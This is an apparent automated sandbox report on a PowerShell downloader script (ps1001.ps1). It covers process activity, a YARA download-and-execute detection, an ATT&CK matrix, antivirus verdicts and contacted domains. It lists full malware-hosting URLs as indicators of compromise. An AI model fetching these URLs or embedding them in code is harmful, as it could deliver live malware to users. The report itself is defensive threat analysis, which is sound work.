    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wavYoeRSMEjdwAYsYdnMvvcWaqICnCnusAbcSxbdjmxOGMotKAUNhJPdfRIqluSzTyHxSZtOyVNDYqTBljtrqxTiqeSNdhzzwMbmpGUlRSbVmcIkyrKagaTw0
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell download and execute
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTR
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4568.tmp" "c:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading    		11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media3
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture3
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ps1001.ps163%ReversingLabsScript-PowerShell.Downloader.Donoff
    ps1001.ps1100%AviraTR/PowerShell.Gen

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://bemnyc.com0%Avira URL Cloudsafe
    http://fenett2018.com100%Avira URL Cloudmalware
    https://status.squarespace.com0%Avira URL Cloudsafe
    http://eastend.jp/bl5kfa100%Avira URL Cloudmalware
    http://habarimoto24.com0%Avira URL Cloudsafe
    http://yourmother4cancer.info100%Avira URL Cloudmalware
    http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23100%Avira URL Cloudmalware
    http://eastend.jp100%Avira URL Cloudmalware
    http://bemnyc.com/u8erijeq100%Avira URL Cloudmalware
    http://fenett2018.com/dobgx100%Avira URL Cloudmalware
    http://habarimoto24.com/nh0%Avira URL Cloudsafe
    http://abakus-biuro.net0%Avira URL Cloudsafe
    http://abakus-biuro.net//a9zqemm100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    eastend.jp
    		162.43.104.133
    		truefalse
      		unknown
      bemnyc.com
      		198.185.159.145
      		truefalse
        		unknown
        fenett2018.com
        		unknown
        		unknownfalse
          		unknown
          yourmother4cancer.info
          		unknown
          		unknownfalse
            		unknown
            habarimoto24.com
            		unknown
            		unknownfalse
              		unknown
              abakus-biuro.net
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://bemnyc.com/u8erijeqfalse
                • Avira URL Cloud: malware
                		unknown
                http://eastend.jp/bl5kfafalse
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2374538901.0000025010DE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.0000025001842000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://yourmother4cancer.infopowershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
